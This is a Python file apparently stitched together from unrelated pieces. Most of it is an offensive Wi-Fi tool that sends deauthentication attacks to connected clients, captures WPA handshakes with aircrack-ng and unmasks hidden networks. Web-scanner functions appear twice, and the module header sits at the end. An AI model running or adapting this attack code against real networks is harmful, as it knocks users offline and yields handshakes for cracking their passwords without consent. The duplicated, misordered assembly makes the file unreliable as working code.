def getHandshakes(target_bssid,target_ssids,ListenInterface,AttackInterface,verbose=True):
    """Work through the parsed AP/station tables and collect one handshake per ESSID.

    For every access point row that passes the BSSID/ESSID filters, each
    station row associated with that BSSID is handed to ``deauth()``; the
    resulting ``.cap`` file is then passed to ``aircrack-ng -J`` and the
    command's stdout is checked for its "Successfully written" message.

    Args:
        target_bssid: Optional filter; matched as a case-insensitive
            substring of the AP's BSSID.
        target_ssids: Optional collection compared against ``essid.lower()``
            (presumably already lower-cased by the caller - confirm).
        ListenInterface, AttackInterface: Passed to ``deauth()`` and rebound
            to whatever ``deauth()`` returns.
        verbose: When true, status messages are printed.

    Returns:
        The list of ESSIDs for which aircrack-ng reported a written .hccap.
    """
    handshakes = []
    tested = []
    # APs and stations are module-level names defined outside this block.
    cleanAPs = clean_AP_data(APs)
    for bssid,essid,channel,privacy,authentication,AP_date in cleanAPs:
        if target_bssid and (not target_bssid.lower() in bssid.lower()):
            continue
        # Skip empty ESSIDs and ones containing the literal text "\x00"
        # (the four characters backslash-x-0-0, not a NUL byte), and any ESSID
        # already captured.
        if (essid and '\\x00' not in essid and essid not in handshakes) and ((target_ssids and essid.lower() in target_ssids) or (not target_ssids)):
            cleanStations = clean_station_data(stations)
            for station_mac,connected_bssid,station_date in cleanStations:
                # channel '-1' rows are excluded; each (bssid, station) pair is tried once.
                if (bssid == connected_bssid and channel != '-1') and (essid not in handshakes) and ((bssid,station_mac) not in tested):
                    # The ESSID part of the file name is reduced to [a-z0-9];
                    # bssid and channel are used exactly as parsed from the CSV.
                    outFileName = "%s_%s_%s" % (''.join([c for c in essid.lower() if c in ascii_lowercase or c in digits]),bssid,channel)
                    # NOTE: deauth() is defined elsewhere; judging by its name and the
                    # ACK count it returns, it presumably sends 802.11 deauthentication
                    # frames. Clients that negotiated Protected Management Frames
                    # (802.11w) discard forged ones.
                    (ACK,(ListenInterface,AttackInterface)) = deauth(bssid,channel,station_mac,MAX_CLIENT_DEAUTH,outFileName,ListenInterface,AttackInterface,verbose)
                    outFileNames,outCAPFile = find_output_files(outFileName,'.cap')
                    handshakeFile = 'W00T-'+outCAPFile.replace('.cap','')
                    # NOTE(review): the command is built by string interpolation. Whether
                    # run_process() goes through a shell is not visible here; if it does,
                    # file names derived from CSV fields should be passed as an argv list.
                    extractHandshake = "aircrack-ng %s -J %s" % (outCAPFile,handshakeFile)
                    stdout, stderr = run_process(extractHandshake,MAX_PROC_WAIT)
                    # Precedence: % binds tighter than +, and + tighter than `in`, so this
                    # tests whether the whole "...<name>.hccap" message occurs in stdout.
                    if (ACK >= MIN_ACKs) and not ("Successfully written to %s" % handshakeFile+'.hccap' in stdout):
                        if verbose:
                            print_warning("Too many deauthentication packets sent to \"%s\", the station's wireless card is having issues reconnecting... Try running this script against \"%s / %s\" later..." % (station_mac,essid,bssid))
                    elif "Successfully written to %s" % handshakeFile+'.hccap' in stdout:
                        newOutCAPFile = "W00T-"+outCAPFile
                        os.rename(outCAPFile,newOutCAPFile)
                        if verbose:
                            print_success("Handshake captured for the \"%s\" SSID! Output written to \"%s\" and \"%s\"" % (essid,newOutCAPFile,handshakeFile+'.hccap'))
                        handshakes.append(essid)
                    # Remove the capture's working files. After a successful rename the
                    # original .cap path no longer exists, so removal errors are ignored.
                    # NOTE(review): the bare except hides every other failure as well.
                    for outFile in outFileNames:
                        try:
                            os.remove(outFile)
                        except:
                            pass
                    tested.append((bssid,station_mac))
                else:
                    pass
    if not tested:
        if verbose:
            print_error("No clients are connected to target SSID(s) and/or BSSID...")
    return handshakes
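def urllist(config):
    """
    Builds arguments to handle_url as tuples for starmap()

    This is a generator, wrapping another generator... (config,url)

    ``config['source']`` selects where the URLs come from:

    * ``'hosts'``    - every host from ``hostlist(config['hosts'])`` combined
      with every port listed under ``config['http']`` / ``config['https']``.
    * ``'urls'``     - the entries of ``config['hosts']`` as given.
    * ``'url-file'`` - one URL per line from each file named in
      ``config['hosts']``; ``'-'`` means standard input.

    Any other source value yields nothing.
    """
    source = config['source']
    if source == 'hosts':
        for host in hostlist(config['hosts']):
            for proto in ('http', 'https'):
                for port in config[proto]:
                    yield (config, "%s://%s:%s/" % (proto, host, port))
    elif source == 'urls':
        for url in config['hosts']:
            yield (config, url)
    elif source == 'url-file':
        for urlfile in config['hosts']:
            if urlfile == '-':
                fp = sys.stdin
            else:
                try:
                    fp = open(urlfile)
                except IOError:
                    print_error("Unable to open %s as url list file." % urlfile)
                    continue
            try:
                for line in fp:
                    url = line.strip()
                    # Blank lines (e.g. a trailing newline) are not URLs; do not
                    # hand an empty string to the consumer.
                    if url:
                        yield (config, url)
            finally:
                # Close files this function opened; stdin belongs to the caller.
                if fp is not sys.stdin:
                    fp.close()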
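def urllist(config):
    """
    Builds arguments to handle_url as tuples for starmap()

    This is a generator, wrapping another generator... (config,url)

    The value of ``config['source']`` decides how URLs are produced:
    ``'hosts'`` expands ``hostlist(config['hosts'])`` over the ports listed
    under ``config['http']`` and ``config['https']``; ``'urls'`` passes the
    entries of ``config['hosts']`` through; ``'url-file'`` reads one URL per
    line from each named file (``'-'`` is standard input). Any other value
    produces an empty generator.
    """
    if config['source'] == 'hosts':
        for host in hostlist(config['hosts']):
            for proto in 'http', 'https':
                for port in config[proto]:
                    url = "%s://%s:%s/" % (proto, host, port)
                    yield (config, url)
    elif config['source'] == 'urls':
        for url in config['hosts']:
            yield (config, url)
    elif config['source'] == 'url-file':
        for urlfile in config['hosts']:
            opened_here = urlfile != '-'
            if not opened_here:
                fp = sys.stdin
            else:
                try:
                    fp = open(urlfile)
                except IOError:
                    print_error("Unable to open %s as url list file." % urlfile)
                    continue
            try:
                for line in fp:
                    stripped = line.strip()
                    if not stripped:
                        # Skip blank lines instead of yielding an empty URL.
                        continue
                    yield (config, stripped)
            finally:
                # Release the handle for files opened above; never close stdin.
                if opened_here:
                    fp.close()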
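def openfp(self,fname):
    """Open the output file for writing

    An empty/None ``fname`` or ``'-'`` selects ``sys.stdout``; anything else
    is opened in text write mode (truncating an existing file). The handle is
    stored on ``self.fp``.

    Raises:
        IOError: re-raised after reporting when the file cannot be opened.
    """
    if not fname or fname == '-':
        self.fp = sys.stdout
    else:
        try:
            self.fp = open(fname, "w")
        except IOError:
            # The message needs a %s placeholder: without one the % operator
            # raises TypeError here and masks the original IOError.
            print_error("Unable to open file for output: %s" % fname)
            raise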
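def split_CSVs(inputFiles=None, APFileName=AP_FILE_NAME, stationFileName=STATION_FILE_NAME):
    """Split Airodump-ng CSV output into one AP file and one station file.

    Each input file is cut at the first blank line (``\\r\\n\\r\\n``): the
    part before it is treated as the access-point table, the part after it as
    the station table. Header rows are dropped and a single header is written
    at the top of each output file.

    Args:
        inputFiles: CSV files to read. When empty or None, every ``*.csv`` in
            the current directory is used, except names containing "kismet"
            and this function's own output files.
        APFileName: Path the merged AP table is written to.
        stationFileName: Path the merged station table is written to.

    Returns:
        ``(APFileName, stationFileName)``.

    On any processing error a message is printed and the process exits with
    status 1.
    """
    apHeaderMark = "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication"
    stationHeaderMark = "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs"
    APs = []
    stations = []
    try:
        if not inputFiles:
            # Never feed earlier output of this function back in as input.
            skipped = (AP_FILE_NAME, STATION_FILE_NAME, APFileName, stationFileName)
            csvFiles = [
                name for name in os.listdir('.')
                if name.endswith('.csv') and 'kismet' not in name and name not in skipped
            ]
        else:
            csvFiles = inputFiles
        if not csvFiles:
            raise Exception("No CSV files found in the CWD...")
        for csvFile in csvFiles:
            with open(csvFile) as csvFileObject:
                csvContent = csvFileObject.read().split('\r\n\r\n')
            for line in csvContent[0].split('\n'):
                if len(line) > 1 and apHeaderMark not in line:
                    APs.append(line)
            # A file without a station section raises IndexError here and is
            # reported through the handler below.
            for line in csvContent[1].split('\n'):
                if len(line) > 1 and stationHeaderMark not in line:
                    stations.append(line)
        APs = "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\n" + '\n'.join(APs)
        stations = "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs\n" + '\n'.join(stations)
        with open(APFileName, 'w') as apOut:
            apOut.write(APs)
        with open(stationFileName, 'w') as stationOut:
            stationOut.write(stations)
    except Exception as err:
        # Exception (not a bare except) so Ctrl-C and SystemExit pass through;
        # the cause is reported before the generic hint.
        print_error("Unable to split Airodump-ng CSV output: %s" % err)
        print_error(
            "You must run this from a directory containing Airodump-ng CSV output files and ensure you don't have any other CSV files in the CWD... Exiting..."
        )
        sys.exit(1)
    return APFileName, stationFileName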
def deauthAttack(target_bssid, target_ssids, target_station, ListenInterface, AttackInterface, verbose=True):
    """Call ``deauth()`` for every in-scope (BSSID, station) pair and return the pairs tried.

    Args:
        target_bssid: Optional filter; case-insensitive substring of the BSSID.
        target_ssids: Optional collection compared against ``essid.lower()``
            (presumably already lower-cased by the caller - confirm).
        target_station: Optional filter; case-insensitive substring of the
            station MAC. A falsy value means "all stations".
        ListenInterface, AttackInterface: Passed to ``deauth()`` and rebound
            to the pair it returns.
        verbose: Forwarded to ``deauth()``; also gates the final message.

    Returns:
        List of ``(bssid, station_mac)`` tuples that were processed.
    """
    tested = []
    # APs and stations are module-level names defined outside this block.
    cleanAPs = clean_AP_data(APs)
    for bssid, essid, channel, privacy, authentication, AP_date in cleanAPs:
        if target_bssid and (not target_bssid.lower() in bssid.lower()):
            continue
        # Only named networks: empty ESSIDs and ones containing the literal
        # text "\x00" are skipped.
        if (essid and '\\x00' not in essid) and (
                (target_ssids and essid.lower() in target_ssids) or
                (not target_ssids)):
            cleanStations = clean_station_data(stations)
            for station_mac, connected_bssid, station_date in cleanStations:
                # Normalise None/empty to '' so .lower() below is safe.
                if not target_station:
                    target_station = ''
                if (bssid == connected_bssid and channel != '-1') and (
                        (bssid, station_mac) not in tested) and (
                        (target_station and target_station.lower() in station_mac.lower()) or
                        (not target_station)):
                    outFileName = "%s_%s" % (bssid, channel)
                    # The ACK count returned by deauth() is not used in this function.
                    (ACK, (ListenInterface, AttackInterface)) = deauth(
                        bssid, channel, station_mac, MAX_CLIENT_DEAUTH,
                        outFileName, ListenInterface, AttackInterface, verbose)
                    # Nothing is kept: every file matching the prefix is deleted.
                    outFileNames, notRequired = find_output_files(
                        outFileName, '')
                    for outFile in outFileNames:
                        # NOTE(review): bare except silently ignores any removal failure.
                        try:
                            os.remove(outFile)
                        except:
                            pass
                    tested.append((bssid, station_mac))
                else:
                    pass
    if not tested:
        if verbose:
            print_error(
                "No clients are connected to target SSID(s) and/or BSSID...")
    return tested
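def go(config):
    """Main function to handle execution

    Steps, in order:

    1. Load every rule named in ``config['rules']`` through
       ``rules.loadRule``, instantiate it with ``config`` and store
       ``(instance, config['rules'][name])`` pairs in ``config['ruleset']``.
    2. Obtain the output writers from ``output.getOutputs``.
    3. Run ``net.handle_url`` over ``urllist(config)`` on an eventlet
       ``GreenPool`` of ``config['conns']`` green threads.
    4. Drop falsy results, sort the rest by element ``[1]`` in descending
       order and pass the list to every writer's ``writeall``.
    """
    # Dynamically load the configured rules
    # NOTE(review): rule names come straight from config and select code to
    # load; if the config can be edited by a less-trusted party, check the
    # names against a known set before calling loadRule (loadRule itself is
    # not visible here).
    ruleset = []
    # Iterating the dict directly works on both Python 2 and 3 (iterkeys()
    # exists only on Python 2).
    for r in config['rules']:
        try:
            rule = rules.loadRule(r)
            ruleset.append((rule(config), config['rules'][r]))
        except (ImportError, AttributeError):
            # A rule that cannot be loaded is reported and skipped.
            print_error("ERROR: Unable to import rule %s!" % r)
    config['ruleset'] = ruleset
    # Get outputs
    outputs = output.getOutputs(config['output'])
    # Build the eventlet pool and fire off processing
    pool = eventlet.GreenPool(config['conns'])
    res = pool.starmap(net.handle_url, urllist(config))
    # Sort results and print data
    res = sorted(filter(None, res), key=lambda val: val[1], reverse=True)
    for o in outputs:
        o.writeall(res)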
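def go(config):
    """Main function to handle execution

    Loads the rules named in ``config['rules']`` into ``config['ruleset']``
    as ``(rule_instance, configured_value)`` pairs, feeds ``urllist(config)``
    to ``net.handle_url`` through an eventlet ``GreenPool`` sized by
    ``config['conns']``, then hands the non-empty results, sorted by element
    ``[1]`` from highest to lowest, to each configured output's ``writeall``.
    """
    # Dynamically load the configured rules
    # NOTE(review): the rule name is taken from config and decides what
    # rules.loadRule loads - restrict it to expected names if the config is
    # not fully trusted (loadRule is defined elsewhere).
    ruleset = []
    # Plain dict iteration instead of the Python-2-only iterkeys().
    for r in config['rules']:
        try:
            rule = rules.loadRule(r)
            ruleset.append((rule(config),config['rules'][r]))
        except (ImportError,AttributeError):
            # Report and continue with the remaining rules.
            print_error("ERROR: Unable to import rule %s!" % r)
    config['ruleset'] = ruleset
    # Get outputs
    outputs = output.getOutputs(config['output'])
    # Build the eventlet pool and fire off processing
    pool = eventlet.GreenPool(config['conns'])
    res = pool.starmap(net.handle_url,urllist(config))
    # Sort results and print data
    res = sorted(filter(None,res),key=lambda val: val[1],reverse=True)
    for o in outputs:
        o.writeall(res)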
def findHiddenNetworks(target_bssid, target_ssids, ListenInterface, AttackInterface, verbose=True):
    """Look for the ESSID of access points whose ESSID is empty or masked.

    For each AP row with an empty ESSID (or one containing the literal text
    "\\x00") and each station associated with it, ``deauth()`` is called and
    the CSV it leaves behind is re-parsed; any named ESSID found there is
    recorded.

    Args:
        target_bssid: Optional filter; case-insensitive substring of the BSSID.
        target_ssids: Optional collection compared against the discovered
            ESSID lower-cased (presumably lower-cased by the caller - confirm).
        ListenInterface, AttackInterface: Passed to ``deauth()`` and rebound
            to the pair it returns.
        verbose: Gates most status messages.

    Returns:
        List of ``(bssid, discovered_essid)`` tuples.
    """
    discovered = []
    tested = []
    # APs and stations are module-level names defined outside this block.
    cleanAPs = clean_AP_data(APs)
    for bssid, essid, channel, privacy, authentication, AP_date in cleanAPs:
        if target_bssid and (not target_bssid.lower() in bssid.lower()):
            continue
        if '\\x00' in essid or not essid:
            cleanStations = clean_station_data(stations)
            for station_mac, connected_bssid, station_date in cleanStations:
                # Skip pairs already tried and BSSIDs already resolved.
                if (bssid == connected_bssid and channel != '-1') and (
                        not (bssid, station_mac) in tested) and (
                        not bssid in [d[0] for d in discovered]):
                    invalidTargetUnmasked = False
                    numOfDiscovered = len(discovered)
                    outFileName = "HIDDEN_%s_%s" % (bssid, channel)
                    (ACK, (ListenInterface, AttackInterface)) = deauth(
                        bssid, channel, station_mac, MAX_CLIENT_DEAUTH,
                        outFileName, ListenInterface, AttackInterface, verbose)
                    outFileNames, outCSVFile = find_output_files(
                        outFileName, '.csv')
                    APFileName = 'APs_' + outFileName + '.csv'
                    stationFileName = 'stations_' + outFileName + '.csv'
                    # NOTE(review): split_CSVs() calls sys.exit(1) on any error, so a
                    # missing or malformed capture CSV ends the whole run here.
                    split_CSVs(inputFiles=[outCSVFile],
                               APFileName=APFileName,
                               stationFileName=stationFileName)
                    discoveredAPs = parse_APs(APFileName)
                    cleanDiscoveredAPs = clean_AP_data(discoveredAPs)
                    for dis_bssid, dis_essid, dis_channel, dis_privacy, dis_authentication, dis_AP_date in cleanDiscoveredAPs:
                        # Named ESSID that is in scope (or no scope given): keep the CSV.
                        if (dis_essid and not '\\x00' in dis_essid) and (
                                not target_ssids or dis_essid.lower() in target_ssids):
                            # NOTE(review): dis_essid is data read from the capture and goes
                            # into a file name with only whitespace replaced; path separators
                            # are not filtered here.
                            # NOTE(review): if more than one row matches, the second rename
                            # fails because outCSVFile has already been moved.
                            newOutCSVFile = outCSVFile.replace(
                                "HIDDEN_",
                                "W00T-UNHIDDEN_%s_" % '+'.join(dis_essid.split()))
                            os.rename(outCSVFile, newOutCSVFile)
                            if verbose:
                                print_success(
                                    "\"%s\" discovered! Output written to \"%s\"" %
                                    (dis_essid, newOutCSVFile))
                            discovered.append((bssid, dis_essid))
                        # Named ESSID outside the requested scope: report, keep nothing.
                        if (dis_essid and not '\\x00' in dis_essid) and (
                                target_ssids and not dis_essid.lower() in target_ssids):
                            invalidTargetUnmasked = True
                            print_warning(
                                "\"%s\" was discovered, but output was not stored..."
                                % dis_essid)
                    # Enough ACKs but nothing new learned and nothing out of scope seen.
                    if (ACK >= MIN_ACKs) and (
                            len(discovered) == numOfDiscovered) and not invalidTargetUnmasked:
                        if verbose:
                            print_warning(
                                "Too many deauthentication packets sent to \"%s\", the station's wireless card is having issues reconnecting... Try running this script against \"%s\" later..."
                                % (station_mac, bssid))
                    # Clean up working files; a renamed CSV is already gone, hence the
                    # ignored errors. NOTE(review): the bare except hides all other failures.
                    for outputFile in outFileNames:
                        try:
                            os.remove(outputFile)
                        except:
                            pass
                    # These two removals are not guarded and raise if a file is missing.
                    os.remove(APFileName)
                    os.remove(stationFileName)
                    tested.append((bssid, station_mac))
                else:
                    pass
    if not tested:
        if verbose:
            print_error(
                "No clients are connected to target SSID(s) and/or BSSID...")
    return discovered
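#!/usr/bin/python
"""
RedSpectrum - parse_airodump.py
April 1, 2017
Leopold von Niebelschuetz-Godlewski

Looks in the CWD for Airodump-ng .csv output files, and prints two tables
containing wireless reconnaissance details.
"""
import argparse
import csv
import os
import sys

from core import print_error, print_warning, print_success

try:
    from prettytable import PrettyTable
except ImportError:
    # Only a missing module should produce the install hint; a bare except
    # would also swallow Ctrl-C and unrelated errors raised during import.
    print_error("You must install PrettyTable module first... Exiting...")
    sys.exit(1)

AP_FILE_NAME = "APs.csv"
STATION_FILE_NAME = "stations.csv"


def parse_APs(fileName=AP_FILE_NAME):
    """Read the access-point CSV and return one tuple per usable row.

    Rows whose BSSID is the all-zero address are skipped. Column names other
    than ``BSSID`` carry a leading space, matching the header text used for
    these files.

    Returns:
        List of ``(bssid, essid, channel, privacy, authentication, seen)``
        tuples of stripped strings, where ``seen`` is the first
        whitespace-separated token of the "Last time seen" column
        (presumably the date - confirm against the capture format).
    """
    APs = []
    with open(fileName) as csvFile:
        for row in csv.DictReader(csvFile):
            if row['BSSID'] == "00:00:00:00:00:00":
                continue
            APs.append((
                row['BSSID'].strip(),
                row[' ESSID'].strip(),
                row[' channel'].strip(),
                row[' Privacy'].strip(),
                row[' Authentication'].strip(),
                row[' Last time seen'].strip().split()[0],
            ))
    return APs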